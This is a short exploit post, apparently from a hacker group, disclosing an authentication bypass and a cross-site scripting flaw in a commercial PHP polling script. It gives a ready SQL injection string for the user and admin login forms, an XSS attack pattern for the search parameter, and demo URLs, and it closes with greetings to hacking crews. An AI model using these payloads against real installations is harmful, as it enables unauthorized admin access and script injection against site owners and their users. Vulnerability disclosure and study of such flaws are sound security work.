37 lines
No EOL
1.4 KiB
Text
37 lines
No EOL
1.4 KiB
Text
______________________________________________________________________________
|
|
XSS and Authentication bypass in Advanced Poll Script
|
|
Vendor:http://www.2daybiz.com/ ___________________________Author:Sid3^effects_________________________________
|
|
|
|
|
|
Description :
|
|
|
|
Advanced Poll is a polling system with powerful administration tool supports both text file and MySQL database. Its features include multiple polls, unlimited options, IP-Logging, IP-Locking, cookie support, comment feature, vote expire feature, and random poll support.
|
|
|
|
script cost :$140
|
|
---------------------------------------------------------------------------
|
|
* Authentication bypass:
|
|
|
|
The following script has authentication bypass in the admin login as well as in user login
|
|
|
|
use ' or 1=1 or ''=' in both login and password.
|
|
|
|
user login demo :http://server/polls/login.php
|
|
admin login demo: http://server/polls/admin/
|
|
---------------------------------------------------------------------------
|
|
* XSS (cross site scripting ) :
|
|
|
|
XSS is also found in the search field.
|
|
|
|
|
|
Attack Pattern: '"-->
|
|
|
|
DEMO:http://server/polls/index_search.php?category= [XSS]
|
|
---------------------------------------------------------------------------
|
|
|
|
ShoutZ :
|
|
-------
|
|
---Indian Cyber warriors--Andhra hackers--
|
|
|
|
Greetz :
|
|
--------
|
|
---*L0rd ÇrusAdêr*---d4rk-blu™® [ICW]---R45C4L idi0th4ck3r---CR4C|< 008---M4n0j--MayUr-- |